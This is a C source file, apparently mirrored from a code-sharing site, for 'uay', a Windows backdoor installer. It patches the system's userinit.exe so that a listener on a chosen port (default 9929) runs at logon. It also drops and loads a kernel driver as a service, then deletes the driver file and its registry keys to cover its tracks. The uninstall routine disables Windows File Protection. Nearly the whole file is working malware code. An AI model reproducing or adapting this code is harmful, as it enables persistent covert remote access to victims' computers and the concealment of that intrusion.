www.pudn.com > uay_source.rar > mAin.c
#include#include #include typedef struct _SIGNANDPORT{ unsigned int sign; unsigned int port; }SIGNANDPORT,*PSIGNANDPORT; void BAckUpOriginUserinit(void); int ReleAseTheExe( char* towhere //这个参数还要作为CombineWithUserinit的第一个参数 ); int CombineWithUserinit( char* who,///like "C:\\WINDOWS\\System32\\bd_sys.exe" 被释放的文件地址 char* wheretoreleAse,//生成的userinit.exe的位置,名字不固定 int port ); int ReplAceUserinit( char* withwhom //CombineWithUserinit的第2个参数 //函数不负责删除withwhom ); int DeleteSysKey(void); int ReleAseTheSys(void); int LoAdSys(void); void InstAll(int port); BOOL AlreAdyInstAlled(void); void UsAge(void); void UnInstAll(void); BOOL DisAbleWFP( void ); DWORD FindProcess( char* pProcessNAme ); PULONG GetHandleList( void ); BOOL CompAreStringBAckwArds( WCHAR *Str1, WCHAR *Str2 ); BOOL DisAbleWFP( void ); int RAisePrivilege( void ); //-------------------------------------------------------------------- int main(int Argc,char* Argv[]) { if(Argc >=3){ printf("too mAny Arguments\n"); UsAge(); return 0; } if(Argc == 1){ //没有参数,用端口9929 if(!AlreAdyInstAlled()){ InstAll(9929); return 0; } else{ printf("AlreAdy instAlled,you should uninstAll it first.\n"); //UsAge(); return 0; } } else{ if ( 0 == stricmp(Argv[1],"/?") || 0 == stricmp(Argv[1],"-h") || 0 == stricmp(Argv[1],"--help") || 0 == stricmp(Argv[1],"help") ) { UsAge(); return 0; } if(0 == stricmp(Argv[1],"-u")){ UnInstAll(); return 0; } else{ if(atoi(Argv[1]) > 0 && atoi(Argv[1]) < 32768){ if(!AlreAdyInstAlled()){ InstAll(atoi(Argv[1])); return 0; } else{ printf("AlreAdy instAlled,you should uninstAll it first.\n"); //UsAge(); return 0; } } else{ printf("wrong port number\n"); //UsAge(); return 0; } } } return 0; } //-------------------------------------------------------------------- void BAckUpOriginUserinit(void) { char pAth_userinit[MAX_PATH+1]; char pAth_bAckupfile[MAX_PATH+1]; GetSystemDirectory(pAth_userinit,MAX_PATH); GetSystemDirectory(pAth_bAckupfile,MAX_PATH); strcat(pAth_userinit,"\\userinit.exe"); strcat(pAth_bAckupfile,"\\u_uay_woAini.exe"); CopyFile(pAth_userinit,pAth_bAckupfile,FALSE); } //-------------------------------------------------------------------- int ReleAseTheSys(void) { HRSRC hRes = NULL; DWORD dwResSize = 0; HGLOBAL hResource = NULL; LPVOID lpfResource = NULL; HANDLE hFile = NULL; char SystemDir[128];//i think it's enough DWORD dwWritten; DWORD result; hRes = FindResource(NULL,"uay","sys"); if (hRes == NULL) { return -1; } dwResSize = SizeofResource(NULL,hRes); if (dwResSize == 0) { return -1; } hResource = LoadResource(NULL,hRes); if (hResource == NULL){ return -1; } lpfResource = LockResource(hResource); if (lpfResource == NULL) { return -1; } GetSystemDirectory(SystemDir,128); strcat(SystemDir,"\\uay.sys"); hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL); if (hFile == NULL){ return -1; } result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL); if (result == 0){ return -1; } CloseHandle(hFile); return 0; } //-------------------------------------------------------------------- int LoAdSys(void) { //创建服务,加载驱动 SC_HANDLE hSCHAndle; SC_HANDLE hSCMAnAger; char systemdir[MAX_PATH+1]; char pAth[MAX_PATH+1]; GetSystemDirectory(systemdir,MAX_PATH); sprintf(pAth,"%s\\%s",systemdir,"uay.sys"); hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); //remove old instAnces hSCHAndle = OpenService(hSCMAnAger, "uay.sys", SERVICE_ALL_ACCESS ); if (hSCHAndle == NULL){ //throw //return -1; } DeleteService(hSCHAndle); CloseServiceHandle(hSCHAndle); //ignore success of instAllAtion:it mAy AlreAdy be instAlled hSCHAndle = CreateService( hSCMAnAger, "uay.sys", "uay.sys", SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, pAth, NULL, NULL, NULL, NULL, NULL ); if (hSCHAndle == NULL){ printf("CreAteService error: %d\n",GetLastError()); //return -1; } CloseServiceHandle(hSCHAndle); //ignore success of stArt: it mAy ALreAdy be stAarted hSCHAndle = OpenService(hSCMAnAger, "uay.sys", SERVICE_ALL_ACCESS ); if (hSCHAndle == NULL){ printf("OpenService error: %d\n",GetLastError()); //return -1; } StartService(hSCHAndle,0,NULL); //printf("stArtService %d\n",GetLastError()); CloseServiceHandle(hSCHAndle); CloseServiceHandle(hSCMAnAger); return 0; } //-------------------------------------------------------------------- int DeleteSysKey(void) { RegDeleteKey( HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum" ); //printf("RegDeleteKey: %d\n",GetLastError()); RegDeleteKey( HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security" ); //printf("RegDeleteKey: %d\n",GetLastError()); RegDeleteKey( HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\uay.sys" ); //printf("RegDeleteKey: %d\n",GetLastError()); return 0; } //-------------------------------------------------------------------- void InstAll(int port) { char syspAth[MAX_PATH+1]; char tempfile_before_combine[MAX_PATH+1]; char tempfile_After_combine[MAX_PATH+1]; GetSystemDirectory(tempfile_before_combine,MAX_PATH); strcat(tempfile_before_combine,"\\temp_u_userinit_before.exe"); GetSystemDirectory(tempfile_After_combine,MAX_PATH); strcat(tempfile_After_combine,"\\temp_u_userinit_After.exe"); //找个不注意的地方把userinit.exe bAckup一个,可以用这个文件来恢复 :> BAckUpOriginUserinit(); ReleAseTheExe(tempfile_before_combine); CombineWithUserinit( tempfile_before_combine, tempfile_After_combine, port ); //删除合并前的临时文件 DeleteFile(tempfile_before_combine); ReplAceUserinit(tempfile_After_combine); //删除合并后的临时文件,现在userinit.exe已经是我们的了,再没有多余文件 :> DeleteFile(tempfile_After_combine); //为了首次运行 //驱动部分 ReleAseTheSys(); LoAdSys(); //delete the sys,reg. GetSystemDirectory(syspAth,MAX_PATH); strcat(syspAth,"\\uay.sys"); DeleteFile(syspAth); //printf("DeleteFile: %d\n",GetLastError()); DeleteSysKey(); } //-------------------------------------------------------------------- BOOL AlreAdyInstAlled(void) { FILE* pFile; char pAth[MAX_PATH]; SIGNANDPORT SignAndPort; GetSystemDirectory(pAth,MAX_PATH); strcat(pAth,"\\userinit.exe"); pFile = fopen(pAth,"rb"); if(0 != fseek(pFile,90,SEEK_SET)){ printf("some error occur when cAll to fseek,exit instAll\n"); exit(-1); } fread(&SignAndPort,1,sizeof(SIGNANDPORT),pFile); fclose(pFile); if(SignAndPort.sign == 0xAABBCCDD){ return TRUE; } return FALSE; } //-------------------------------------------------------------------- void UsAge(void) { printf( "\n" " uay.exe\n"// to qinqin,my truelove And soul mate\n" " writen by uty@uaty\n\n" "usAge:\n" " uay.exe port specify the port to listen. eg: uay.exe 12345\n" " uay.exe -u uninstAll\n" " uay.exe -h displAy this\n" "note:\n" " defAult port is 9929,And do not chose A port AlreAdy been using\n" ); } //-------------------------------------------------------------------- void UnInstAll(void) { char pAth_bAckup[MAX_PATH+1]; char userinit_system32[MAX_PATH+1]; char userinit_system32_dllcAche[MAX_PATH+1]; if(AlreAdyInstAlled()){ GetSystemDirectory(userinit_system32,MAX_PATH); GetSystemDirectory(userinit_system32_dllcAche,MAX_PATH); strcat(userinit_system32,"\\userinit.exe"); strcat(userinit_system32_dllcAche,"\\dllcache\\userinit.exe"); GetSystemDirectory(pAth_bAckup,MAX_PATH); strcat(pAth_bAckup,"\\u_uay_woAini.exe"); RAisePrivilege(); if(DisAbleWFP()){ DeleteFile(userinit_system32_dllcAche); CopyFile( pAth_bAckup, userinit_system32_dllcAche, FALSE ); DeleteFile(userinit_system32); CopyFile( pAth_bAckup, userinit_system32, FALSE ); printf("replAce done.\n"); } else{ printf("didn't disAble WFP\n"); } } else{ printf("instAll first\n"); } } //--------------------------------------------------------------------